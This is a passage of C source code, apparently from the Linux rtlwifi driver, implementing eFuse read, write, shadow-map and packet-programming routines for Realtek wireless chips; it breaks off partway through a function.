static int efuse_pg_packet_write(struct ieee80211_hw *hw, u8 offset,
u8 word_en, u8 *data);
static void efuse_word_enable_data_read(u8 word_en, u8 *sourdata,
u8 *targetdata);
static u8 efuse_word_enable_data_write(struct ieee80211_hw *hw,
u16 efuse_addr, u8 word_en, u8 *data);
static void efuse_power_switch(struct ieee80211_hw *hw, u8 write,
u8 pwrstate);
static u16 efuse_get_current_size(struct ieee80211_hw *hw);
static u8 efuse_calculate_word_cnts(u8 word_en);
void efuse_initialize(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
u8 bytetemp;
u8 temp;
bytetemp = rtl_read_byte(rtlpriv, rtlpriv->cfg->maps[SYS_FUNC_EN] + 1);
temp = bytetemp | 0x20;
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[SYS_FUNC_EN] + 1, temp);
bytetemp = rtl_read_byte(rtlpriv, rtlpriv->cfg->maps[SYS_ISO_CTRL] + 1);
temp = bytetemp & 0xFE;
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[SYS_ISO_CTRL] + 1, temp);
bytetemp = rtl_read_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_TEST] + 3);
temp = bytetemp | 0x80;
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_TEST] + 3, temp);
rtl_write_byte(rtlpriv, 0x2F8, 0x3);
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 3, 0x72);
}
u8 efuse_read_1byte(struct ieee80211_hw *hw, u16 address)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
u8 data;
u8 bytetemp;
u8 temp;
u32 k = 0;
const u32 efuse_len =
rtlpriv->cfg->maps[EFUSE_REAL_CONTENT_SIZE];
if (address < efuse_len) {
temp = address & 0xFF;
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 1,
temp);
bytetemp = rtl_read_byte(rtlpriv,
rtlpriv->cfg->maps[EFUSE_CTRL] + 2);
temp = ((address >> 8) & 0x03) | (bytetemp & 0xFC);
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 2,
temp);
bytetemp = rtl_read_byte(rtlpriv,
rtlpriv->cfg->maps[EFUSE_CTRL] + 3);
temp = bytetemp & 0x7F;
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 3,
temp);
bytetemp = rtl_read_byte(rtlpriv,
rtlpriv->cfg->maps[EFUSE_CTRL] + 3);
while (!(bytetemp & 0x80)) {
bytetemp = rtl_read_byte(rtlpriv,
rtlpriv->cfg->
maps[EFUSE_CTRL] + 3);
k++;
if (k == 1000) {
k = 0;
break;
}
}
data = rtl_read_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL]);
return data;
} else
return 0xFF;
}
EXPORT_SYMBOL(efuse_read_1byte);
void efuse_write_1byte(struct ieee80211_hw *hw, u16 address, u8 value)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
u8 bytetemp;
u8 temp;
u32 k = 0;
const u32 efuse_len =
rtlpriv->cfg->maps[EFUSE_REAL_CONTENT_SIZE];
RT_TRACE(rtlpriv, COMP_EFUSE, DBG_LOUD, "Addr=%x Data =%x\n",
address, value);
if (address < efuse_len) {
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL], value);
temp = address & 0xFF;
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 1,
temp);
bytetemp = rtl_read_byte(rtlpriv,
rtlpriv->cfg->maps[EFUSE_CTRL] + 2);
temp = ((address >> 8) & 0x03) | (bytetemp & 0xFC);
rtl_write_byte(rtlpriv,
rtlpriv->cfg->maps[EFUSE_CTRL] + 2, temp);
bytetemp = rtl_read_byte(rtlpriv,
rtlpriv->cfg->maps[EFUSE_CTRL] + 3);
temp = bytetemp | 0x80;
rtl_write_byte(rtlpriv,
rtlpriv->cfg->maps[EFUSE_CTRL] + 3, temp);
bytetemp = rtl_read_byte(rtlpriv,
rtlpriv->cfg->maps[EFUSE_CTRL] + 3);
while (bytetemp & 0x80) {
bytetemp = rtl_read_byte(rtlpriv,
rtlpriv->cfg->
maps[EFUSE_CTRL] + 3);
k++;
if (k == 100) {
k = 0;
break;
}
}
}
}
void read_efuse_byte(struct ieee80211_hw *hw, u16 _offset, u8 *pbuf)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
u32 value32;
u8 readbyte;
u16 retry;
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 1,
(_offset & 0xff));
readbyte = rtl_read_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 2);
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 2,
((_offset >> 8) & 0x03) | (readbyte & 0xfc));
readbyte = rtl_read_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 3);
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 3,
(readbyte & 0x7f));
retry = 0;
value32 = rtl_read_dword(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL]);
while (!(((value32 >> 24) & 0xff) & 0x80) && (retry < 10000)) {
value32 = rtl_read_dword(rtlpriv,
rtlpriv->cfg->maps[EFUSE_CTRL]);
retry++;
}
udelay(50);
value32 = rtl_read_dword(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL]);
*pbuf = (u8) (value32 & 0xff);
}
void read_efuse(struct ieee80211_hw *hw, u16 _offset, u16 _size_byte, u8 *pbuf)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
u8 *efuse_tbl;
u8 rtemp8[1];
u16 efuse_addr = 0;
u8 offset, wren;
u16 i;
u16 j;
const u16 efuse_max_section =
rtlpriv->cfg->maps[EFUSE_MAX_SECTION_MAP];
const u32 efuse_len =
rtlpriv->cfg->maps[EFUSE_REAL_CONTENT_SIZE];
u16 **efuse_word;
u16 efuse_utilized = 0;
u8 efuse_usage;
if ((_offset + _size_byte) > rtlpriv->cfg->maps[EFUSE_HWSET_MAX_SIZE]) {
RT_TRACE(rtlpriv, COMP_EFUSE, DBG_LOUD,
"read_efuse(): Invalid offset(%#x) with read bytes(%#x)!!\n",
_offset, _size_byte);
return;
}
/* allocate memory for efuse_tbl and efuse_word */
efuse_tbl = kmalloc(rtlpriv->cfg->maps[EFUSE_HWSET_MAX_SIZE] *
sizeof(u8), GFP_ATOMIC);
if (!efuse_tbl)
return;
efuse_word = kmalloc(EFUSE_MAX_WORD_UNIT * sizeof(u16 *), GFP_ATOMIC);
if (!efuse_word)
goto done;
for (i = 0; i < EFUSE_MAX_WORD_UNIT; i++) {
efuse_word[i] = kmalloc(efuse_max_section * sizeof(u16),
GFP_ATOMIC);
if (!efuse_word[i])
goto done;
}
for (i = 0; i < efuse_max_section; i++)
for (j = 0; j < EFUSE_MAX_WORD_UNIT; j++)
efuse_word[j][i] = 0xFFFF;
read_efuse_byte(hw, efuse_addr, rtemp8);
if (*rtemp8 != 0xFF) {
efuse_utilized++;
RTPRINT(rtlpriv, FEEPROM, EFUSE_READ_ALL,
"Addr=%d\n", efuse_addr);
efuse_addr++;
}
while ((*rtemp8 != 0xFF) && (efuse_addr < efuse_len)) {
offset = ((*rtemp8 >> 4) & 0x0f);
if (offset < efuse_max_section) {
wren = (*rtemp8 & 0x0f);
RTPRINT(rtlpriv, FEEPROM, EFUSE_READ_ALL,
"offset-%d Worden=%x\n", offset, wren);
for (i = 0; i < EFUSE_MAX_WORD_UNIT; i++) {
if (!(wren & 0x01)) {
RTPRINT(rtlpriv, FEEPROM,
EFUSE_READ_ALL,
"Addr=%d\n", efuse_addr);
read_efuse_byte(hw, efuse_addr, rtemp8);
efuse_addr++;
efuse_utilized++;
efuse_word[i][offset] =
(*rtemp8 & 0xff);
if (efuse_addr >= efuse_len)
break;
RTPRINT(rtlpriv, FEEPROM,
EFUSE_READ_ALL,
"Addr=%d\n", efuse_addr);
read_efuse_byte(hw, efuse_addr, rtemp8);
efuse_addr++;
efuse_utilized++;
efuse_word[i][offset] |=
(((u16)*rtemp8 << 8) & 0xff00);
if (efuse_addr >= efuse_len)
break;
}
wren >>= 1;
}
}
RTPRINT(rtlpriv, FEEPROM, EFUSE_READ_ALL,
"Addr=%d\n", efuse_addr);
read_efuse_byte(hw, efuse_addr, rtemp8);
if (*rtemp8 != 0xFF && (efuse_addr < efuse_len)) {
efuse_utilized++;
efuse_addr++;
}
}
for (i = 0; i < efuse_max_section; i++) {
for (j = 0; j < EFUSE_MAX_WORD_UNIT; j++) {
efuse_tbl[(i * 8) + (j * 2)] =
(efuse_word[j][i] & 0xff);
efuse_tbl[(i * 8) + ((j * 2) + 1)] =
((efuse_word[j][i] >> 8) & 0xff);
}
}
for (i = 0; i < _size_byte; i++)
pbuf[i] = efuse_tbl[_offset + i];
rtlefuse->efuse_usedbytes = efuse_utilized;
efuse_usage = (u8) ((efuse_utilized * 100) / efuse_len);
rtlefuse->efuse_usedpercentage = efuse_usage;
rtlpriv->cfg->ops->set_hw_reg(hw, HW_VAR_EFUSE_BYTES,
(u8 *)&efuse_utilized);
rtlpriv->cfg->ops->set_hw_reg(hw, HW_VAR_EFUSE_USAGE,
(u8 *)&efuse_usage);
done:
for (i = 0; i < EFUSE_MAX_WORD_UNIT; i++)
kfree(efuse_word[i]);
kfree(efuse_word);
kfree(efuse_tbl);
}
bool efuse_shadow_update_chk(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
u8 section_idx, i, Base;
u16 words_need = 0, hdr_num = 0, totalbytes, efuse_used;
bool wordchanged, result = true;
for (section_idx = 0; section_idx < 16; section_idx++) {
Base = section_idx * 8;
wordchanged = false;
for (i = 0; i < 8; i = i + 2) {
if ((rtlefuse->efuse_map[EFUSE_INIT_MAP][Base + i] !=
rtlefuse->efuse_map[EFUSE_MODIFY_MAP][Base + i]) ||
(rtlefuse->efuse_map[EFUSE_INIT_MAP][Base + i + 1] !=
rtlefuse->efuse_map[EFUSE_MODIFY_MAP][Base + i +
1])) {
words_need++;
wordchanged = true;
}
}
if (wordchanged)
hdr_num++;
}
totalbytes = hdr_num + words_need * 2;
efuse_used = rtlefuse->efuse_usedbytes;
if ((totalbytes + efuse_used) >=
(EFUSE_MAX_SIZE - EFUSE_OOB_PROTECT_BYTES))
result = false;
RT_TRACE(rtlpriv, COMP_EFUSE, DBG_LOUD,
"efuse_shadow_update_chk(): totalbytes(%#x), hdr_num(%#x), words_need(%#x), efuse_used(%d)\n",
totalbytes, hdr_num, words_need, efuse_used);
return result;
}
void efuse_shadow_read(struct ieee80211_hw *hw, u8 type,
u16 offset, u32 *value)
{
if (type == 1)
efuse_shadow_read_1byte(hw, offset, (u8 *) value);
else if (type == 2)
efuse_shadow_read_2byte(hw, offset, (u16 *) value);
else if (type == 4)
efuse_shadow_read_4byte(hw, offset, (u32 *) value);
}
void efuse_shadow_write(struct ieee80211_hw *hw, u8 type, u16 offset,
u32 value)
{
if (type == 1)
efuse_shadow_write_1byte(hw, offset, (u8) value);
else if (type == 2)
efuse_shadow_write_2byte(hw, offset, (u16) value);
else if (type == 4)
efuse_shadow_write_4byte(hw, offset, value);
}
bool efuse_shadow_update(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
u16 i, offset, base;
u8 word_en = 0x0F;
u8 first_pg = false;
RT_TRACE(rtlpriv, COMP_EFUSE, DBG_LOUD, "--->\n");
if (!efuse_shadow_update_chk(hw)) {
efuse_read_all_map(hw, &rtlefuse->efuse_map[EFUSE_INIT_MAP][0]);
memcpy(&rtlefuse->efuse_map[EFUSE_MODIFY_MAP][0],
&rtlefuse->efuse_map[EFUSE_INIT_MAP][0],
rtlpriv->cfg->maps[EFUSE_HWSET_MAX_SIZE]);
RT_TRACE(rtlpriv, COMP_EFUSE, DBG_LOUD,
"<---efuse out of capacity!!\n");
return false;
}
efuse_power_switch(hw, true, true);
for (offset = 0; offset < 16; offset++) {
word_en = 0x0F;
base = offset * 8;
for (i = 0; i < 8; i++) {
if (first_pg) {
word_en &= ~(BIT(i / 2));
rtlefuse->efuse_map[EFUSE_INIT_MAP][base + i] =
rtlefuse->efuse_map[EFUSE_MODIFY_MAP][base + i];
} else {
if (rtlefuse->efuse_map[EFUSE_INIT_MAP][base + i] !=
rtlefuse->efuse_map[EFUSE_MODIFY_MAP][base + i]) {
word_en &= ~(BIT(i / 2));
rtlefuse->efuse_map[EFUSE_INIT_MAP][base + i] =
rtlefuse->efuse_map[EFUSE_MODIFY_MAP][base + i];
}
}
}
if (word_en != 0x0F) {
u8 tmpdata[8];
memcpy(tmpdata,
&rtlefuse->efuse_map[EFUSE_MODIFY_MAP][base],
8);
RT_PRINT_DATA(rtlpriv, COMP_INIT, DBG_LOUD,
"U-efuse", tmpdata, 8);
if (!efuse_pg_packet_write(hw, (u8) offset, word_en,
tmpdata)) {
RT_TRACE(rtlpriv, COMP_ERR, DBG_WARNING,
"PG section(%#x) fail!!\n", offset);
break;
}
}
}
efuse_power_switch(hw, true, false);
efuse_read_all_map(hw, &rtlefuse->efuse_map[EFUSE_INIT_MAP][0]);
memcpy(&rtlefuse->efuse_map[EFUSE_MODIFY_MAP][0],
&rtlefuse->efuse_map[EFUSE_INIT_MAP][0],
rtlpriv->cfg->maps[EFUSE_HWSET_MAX_SIZE]);
RT_TRACE(rtlpriv, COMP_EFUSE, DBG_LOUD, "<---\n");
return true;
}
void rtl_efuse_shadow_map_update(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
if (rtlefuse->autoload_failflag)
memset(&rtlefuse->efuse_map[EFUSE_INIT_MAP][0], 0xFF,
rtlpriv->cfg->maps[EFUSE_HWSET_MAX_SIZE]);
else
efuse_read_all_map(hw, &rtlefuse->efuse_map[EFUSE_INIT_MAP][0]);
memcpy(&rtlefuse->efuse_map[EFUSE_MODIFY_MAP][0],
&rtlefuse->efuse_map[EFUSE_INIT_MAP][0],
rtlpriv->cfg->maps[EFUSE_HWSET_MAX_SIZE]);
}
EXPORT_SYMBOL(rtl_efuse_shadow_map_update);
void efuse_force_write_vendor_Id(struct ieee80211_hw *hw)
{
u8 tmpdata[8] = { 0xFF, 0xFF, 0xEC, 0x10, 0xFF, 0xFF, 0xFF, 0xFF };
efuse_power_switch(hw, true, true);
efuse_pg_packet_write(hw, 1, 0xD, tmpdata);
efuse_power_switch(hw, true, false);
}
void efuse_re_pg_section(struct ieee80211_hw *hw, u8 section_idx)
{
}
static void efuse_shadow_read_1byte(struct ieee80211_hw *hw,
u16 offset, u8 *value)
{
struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
*value = rtlefuse->efuse_map[EFUSE_MODIFY_MAP][offset];
}
static void efuse_shadow_read_2byte(struct ieee80211_hw *hw,
u16 offset, u16 *value)
{
struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
*value = rtlefuse->efuse_map[EFUSE_MODIFY_MAP][offset];
*value |= rtlefuse->efuse_map[EFUSE_MODIFY_MAP][offset + 1] << 8;
}
static void efuse_shadow_read_4byte(struct ieee80211_hw *hw,
u16 offset, u32 *value)
{
struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
*value = rtlefuse->efuse_map[EFUSE_MODIFY_MAP][offset];
*value |= rtlefuse->efuse_map[EFUSE_MODIFY_MAP][offset + 1] << 8;
*value |= rtlefuse->efuse_map[EFUSE_MODIFY_MAP][offset + 2] << 16;
*value |= rtlefuse->efuse_map[EFUSE_MODIFY_MAP][offset + 3] << 24;
}
static void efuse_shadow_write_1byte(struct ieee80211_hw *hw,
u16 offset, u8 value)
{
struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
rtlefuse->efuse_map[EFUSE_MODIFY_MAP][offset] = value;
}
static void efuse_shadow_write_2byte(struct ieee80211_hw *hw,
u16 offset, u16 value)
{
struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
rtlefuse->efuse_map[EFUSE_MODIFY_MAP][offset] = value & 0x00FF;
rtlefuse->efuse_map[EFUSE_MODIFY_MAP][offset + 1] = value >> 8;
}
static void efuse_shadow_write_4byte(struct ieee80211_hw *hw,
u16 offset, u32 value)
{
struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
rtlefuse->efuse_map[EFUSE_MODIFY_MAP][offset] =
(u8) (value & 0x000000FF);
rtlefuse->efuse_map[EFUSE_MODIFY_MAP][offset + 1] =
(u8) ((value >> 8) & 0x0000FF);
rtlefuse->efuse_map[EFUSE_MODIFY_MAP][offset + 2] =
(u8) ((value >> 16) & 0x00FF);
rtlefuse->efuse_map[EFUSE_MODIFY_MAP][offset + 3] =
(u8) ((value >> 24) & 0xFF);
}
static int efuse_one_byte_read(struct ieee80211_hw *hw, u16 addr, u8 *data)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
u8 tmpidx = 0;
int result;
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 1,
(u8) (addr & 0xff));
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 2,
((u8) ((addr >> 8) & 0x03)) |
(rtl_read_byte(rtlpriv,
rtlpriv->cfg->maps[EFUSE_CTRL] + 2) &
0xFC));
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 3, 0x72);
while (!(0x80 & rtl_read_byte(rtlpriv,
rtlpriv->cfg->maps[EFUSE_CTRL] + 3))
&& (tmpidx < 100)) {
tmpidx++;
}
if (tmpidx < 100) {
*data = rtl_read_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL]);
result = true;
} else {
*data = 0xff;
result = false;
}
return result;
}
static int efuse_one_byte_write(struct ieee80211_hw *hw, u16 addr, u8 data)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
u8 tmpidx = 0;
RT_TRACE(rtlpriv, COMP_EFUSE, DBG_LOUD, "Addr = %x Data=%x\n",
addr, data);
rtl_write_byte(rtlpriv,
rtlpriv->cfg->maps[EFUSE_CTRL] + 1, (u8) (addr & 0xff));
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 2,
(rtl_read_byte(rtlpriv,
rtlpriv->cfg->maps[EFUSE_CTRL] +
2) & 0xFC) | (u8) ((addr >> 8) & 0x03));
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL], data);
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 3, 0xF2);
while ((0x80 & rtl_read_byte(rtlpriv,
rtlpriv->cfg->maps[EFUSE_CTRL] + 3))
&& (tmpidx < 100)) {
tmpidx++;
}
if (tmpidx < 100)
return true;
return false;
}
static void efuse_read_all_map(struct ieee80211_hw *hw, u8 * efuse)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
efuse_power_switch(hw, false, true);
read_efuse(hw, 0, rtlpriv->cfg->maps[EFUSE_HWSET_MAX_SIZE], efuse);
efuse_power_switch(hw, false, false);
}
static void efuse_read_data_case1(struct ieee80211_hw *hw, u16 *efuse_addr,
u8 efuse_data, u8 offset, u8 *tmpdata,
u8 *readstate)
{
bool dataempty = true;
u8 hoffset;
u8 tmpidx;
u8 hworden;
u8 word_cnts;
hoffset = (efuse_data >> 4) & 0x0F;
hworden = efuse_data & 0x0F;
word_cnts = efuse_calculate_word_cnts(hworden);
if (hoffset == offset) {
for (tmpidx = 0; tmpidx < word_cnts * 2; tmpidx++) {
if (efuse_one_byte_read(hw, *efuse_addr + 1 + tmpidx,
&efuse_data)) {
tmpdata[tmpidx] = efuse_data;
if (efuse_data != 0xff)
dataempty = true;
}
}
if (dataempty) {
*readstate = PG_STATE_DATA;
} else {
*efuse_addr = *efuse_addr + (word_cnts * 2) + 1;
*readstate = PG_STATE_HEADER;
}
} else {
*efuse_addr = *efuse_addr + (word_cnts * 2) + 1;
*readstate = PG_STATE_HEADER;
}
}
static int efuse_pg_packet_read(struct ieee80211_hw *hw, u8 offset, u8 *data)
{
u8 readstate = PG_STATE_HEADER;
bool continual = true;
u8 efuse_data, word_cnts = 0;
u16 efuse_addr = 0;
u8 tmpdata[8];
if (data == NULL)
return false;
if (offset > 15)
return false;
memset(data, 0xff, PGPKT_DATA_SIZE * sizeof(u8));
memset(tmpdata, 0xff, PGPKT_DATA_SIZE * sizeof(u8));
while (continual && (efuse_addr < EFUSE_MAX_SIZE)) {
if (readstate & PG_STATE_HEADER) {
if (efuse_one_byte_read(hw, efuse_addr, &efuse_data)
&& (efuse_data != 0xFF))
efuse_read_data_case1(hw, &efuse_addr,
efuse_data,
offset, tmpdata,
&readstate);
else
continual = false;
} else if (readstate & PG_STATE_DATA) {
efuse_word_enable_data_read(0, tmpdata, data);
efuse_addr = efuse_addr + (word_cnts * 2) + 1;
readstate = PG_STATE_HEADER;
}
}
if ((data[0] == 0xff) && (data[1] == 0xff) &&
(data[2] == 0xff) && (data[3] == 0xff) &&
(data[4] == 0xff) && (data[5] == 0xff) &&
(data[6] == 0xff) && (data[7] == 0xff))
return false;
else
return true;
}
static void efuse_write_data_case1(struct ieee80211_hw *hw, u16 *efuse_addr,
u8 efuse_data, u8 offset, int *continual,
u8 *write_state, struct pgpkt_struct *target_pkt,
int *repeat_times, int *result, u8 word_en)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct pgpkt_struct tmp_pkt;
bool dataempty = true;
u8 originaldata[8 * sizeof(u8)];
u8 badworden = 0x0F;
u8 match_word_en, tmp_word_en;
u8 tmpindex;
u8 tmp_header = efuse_data;
u8 tmp_word_cnts;
tmp_pkt.offset = (tmp_header >> 4) & 0x0F;
tmp_pkt.word_en = tmp_header & 0x0F;
tmp_word_cnts = efuse_calculate_word_cnts(tmp_pkt.word_en);
if (tmp_pkt.offset != target_pkt->offset) {
*efuse_addr = *efuse_addr + (tmp_word_cnts * 2) + 1;
*write_state = PG_STATE_HEADER;
} else {
for (tmpindex = 0; tmpindex < (tmp_word_cnts * 2); tmpindex++) {
u16 address = *efuse_addr + 1 + tmpindex;
if (efuse_one_byte_read(hw, address,
&efuse_data) && (efuse_data != 0xFF))
dataempty = false;
}
if (!dataempty) {
*efuse_addr = *efuse_addr + (tmp_word_cnts * 2) + 1;
*write_state = PG_STATE_HEADER;
} else {
match_word_en = 0x0F;
if (!((target_pkt->word_en & BIT(0)) |
(tmp_pkt.word_en & BIT(0))))
match_word_en &= (~BIT(0));
if (!((target_pkt->word_en & BIT(1)) |
(tmp_pkt.word_en & BIT(1))))
match_word_en &= (~BIT(1));
if (!((target_pkt->word_en & BIT(2)) |
(tmp_pkt.word_en & BIT(2))))
match_word_en &= (~BIT(2));
if (!((target_pkt->word_en & BIT(3)) |
(tmp_pkt.word_en & BIT(3))))
match_word_en &= (~BIT(3));
if ((match_word_en & 0x0F) != 0x0F) {
badworden = efuse_word_enable_data_write(
hw, *efuse_addr + 1,
tmp_pkt.word_en,
target_pkt->data);
if (0x0F != (badworden & 0x0F)) {
u8 reorg_offset = offset;
u8 reorg_worden = badworden;
efuse_pg_packet_write(hw, reorg_offset,
reorg_worden,
originaldata);
}
tmp_word_en = 0x0F;
if ((target_pkt->word_en & BIT(0)) ^
(match_word_en & BIT(0)))
tmp_word_en &= (~BIT(0));
if ((target_pkt->word_en & BIT(1)) ^
(match_word_en & BIT(1)))
tmp_word_en &= (~BIT(1));
if ((target_pkt->word_en & BIT(2)) ^
(match_word_en & BIT(2)))
tmp_word_en &= (~BIT(2));
if ((target_pkt->word_en & BIT(3)) ^
(match_word_en & BIT(3)))
tmp_word_en &= (~BIT(3));
if ((tmp_word_en & 0x0F) != 0x0F) {
*efuse_addr = efuse_get_current_size(hw);
target_pkt->offset = offset;
target_pkt->word_en = tmp_word_en;
} else {
*continual = false;
}
*write_state = PG_STATE_HEADER;
*repeat_times += 1;
if (*repeat_times > EFUSE_REPEAT_THRESHOLD_) {
*continual = false;
*result = false;
}
} else {
*efuse_addr += (2 * tmp_word_cnts) + 1;
target_pkt->offset = offset;
target_pkt->word_en = word_en;
*write_state = PG_STATE_HEADER;
}
}
}
RTPRINT(rtlpriv, FEEPROM, EFUSE_PG, "efuse PG_STATE_HEADER-1\n");
}
static void efuse_write_data_case2(struct ieee80211_hw *hw, u16 *efuse_addr,
int *continual, u8 *write_state,
struct pgpkt_struct target_pkt,
int *repeat_times, int *result)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct pgpkt_struct tmp_pkt;
u8 pg_header;
u8 tmp_header;
u8 originaldata[8 * sizeof(u8)];
u8 tmp_word_cnts;
u8 badworden = 0x0F;
pg_header = ((target_pkt.offset << 4) & 0xf0) | target_pkt.word_en;
efuse_one_byte_write(hw, *efuse_addr, pg_header);
efuse_one_byte_read(hw, *efuse_addr, &tmp_header);
if (tmp_header == pg_header) {
*write_state = PG_STATE_DATA;
} else if (tmp_header == 0xFF) {
*write_state = PG_STATE_HEADER;
*repeat_times += 1;
if (*repeat_times > EFUSE_REPEAT_THRESHOLD_) {
*continual = false;
*result = false;
}
} else {
tmp_pkt.offset = (tmp_header >> 4) & 0x0F;
tmp_pkt.word_en = tmp_header & 0x0F;
tmp_word_cnts = efuse_calculate_word_cnts(tmp_pkt.word_en);
memset(originaldata, 0xff, 8 * sizeof(u8));
if (efuse_pg_packet_read(hw, tmp_pkt.offset, originaldata)) {
badworden = efuse_word_enable_data_write(hw,
*efuse_addr + 1, tmp_pkt.word_en,
originaldata);
if (0x0F != (badworden & 0x0F)) {
u8 reorg_offset = tmp_pkt.offset;
u8 reorg_worden = badworden;
efuse_pg_packet_write(hw, reorg_offset,
reorg_worden,
originaldata);
*efuse_addr = efuse_get_current_size(hw);
} else {
*efuse_addr = *efuse_addr + (tmp_word_cnts * 2)
+ 1;
}
} else {
*efuse_addr = *efuse_addr + (tmp_word_cnts * 2) + 1;
}
*write_state = PG_STATE_HEADER;
*repeat_times += 1;
if (*repeat_times > EFUSE_REPEAT_THRESHOLD_) {
*continual = false;
*result = false;
}
RTPRINT(rtlpriv, FEEPROM, EFUSE_PG,
"efuse PG_STATE_HEADER-2\n");
}
}
static int efuse_pg_packet_write(struct ieee80211_hw *hw,
u8 offset, u8 word_en, u8 *data)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct pgpkt_struct target_pkt;
u8 write_state = PG_STATE_HEADER;
int continual = true, result = true;
u16 efuse_addr = 0;
u8 efuse_data;
u8 target_word_cnts = 0;
u8 badworden = 0x0F;
static int repeat_times;
if (efuse_get_current_size(hw) >=
(EFUSE_MAX_SIZE - EFUSE_OOB_PROTECT_BYTES)) {
RTPRINT(rtlpriv, FEEPROM, EFUSE_PG,
"efuse_pg_packet_write error\n");
return false;
}
target_pkt.offset = offset;
target_pkt.word_en = word_en;
memset(target_pkt.data, 0xFF, 8 * sizeof(u8));
efuse_word_enable_data_read(word_en, data, target_pkt.data);
target_word_cnts = efuse_calculate_word_cnts(target_pkt.word_en);
RTPRINT(rtlpriv, FEEPROM, EFUSE_PG, "efuse Power ON\n");
while (continual && (efuse_addr <
(EFUSE_MAX_SIZE - EFUSE_OOB_PROTECT_BYTES))) {
if (write_state == PG_STATE_HEADER) {
badworden = 0x0F;
RTPRINT(rtlpriv, FEEPROM, EFUSE_PG,
"efuse PG_STATE_HEADER\n");
if (efuse_one_byte_read(hw, efuse_addr, &efuse_data) &&
(efuse_data != 0xFF))
efuse_write_data_case1(hw, &efuse_addr,
efuse_data, offset,
&continual,
&write_state, &target_pkt,
&repeat_times, &result,
word_en);
else
efuse_write_data_case2(hw, &efuse_addr,
&continual,
&write_state,
target_pkt,
&repeat_times,
&result);
} else if (write_state == PG_STATE_DATA) {
RTPRINT(rtlpriv, FEEPROM, EFUSE_PG,
"efuse PG_STATE_DATA\n");
badworden =
efuse_word_enable_data_write(hw, efuse_addr + 1,
target_pkt.word_en,
target_pkt.data);
if ((badworden & 0x0F) == 0x0F) {
continual = false;
} else {
efuse_addr += (2 * target_word_cnts) + 1;
target_pkt.offset = offset;
target_pkt.word_en = badworden;
target_word_cnts =
efuse_calculate_word_cnts(target_pkt.
word_en);
write_state = PG_STATE_HEADER;
repeat_times++;
if (repeat_times > EFUSE_REPEAT_THRESHOLD_) {
continual = false;
result = false;
}
RTPRINT(rtlpriv, FEEPROM, EFUSE_PG,
"efuse PG_STATE_HEADER-3\n");
}
}
}
if (efuse_addr >= (EFUSE_MAX_SIZE - EFUSE_OOB_PROTECT_BYTES)) {
RT_TRACE(rtlpriv, COMP_EFUSE, DBG_LOUD,
"efuse_addr(%#x) Out of size!!\n", efuse_addr);
}
return true;
}
static void efuse_word_enable_data_read(u8 word_en,
u8 *sourdata, u8 *targetdata)
{
if (!(word_en & BIT(0))) {
targetdata[0] = sourdata[0];
targetdata[1] = sourdata[1];
}
if (!(word_en & BIT(1))) {
targetdata[2] = sourdata[2];
targetdata[3] = sourdata[3];
}
if (!(word_en & BIT(2))) {
targetdata[4] = sourdata[4];
targetdata[5] = sourdata[5];
}
if (!(word_en & BIT(3))) {
targetdata[6] = sourdata[6];
targetdata[7] = sourdata[7];
}
}
static u8 efuse_word_enable_data_write(struct ieee80211_hw *hw,
u16 efuse_addr, u8 word_en, u8 *data)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
u16 tmpaddr;
u16 start_addr = efuse_addr;
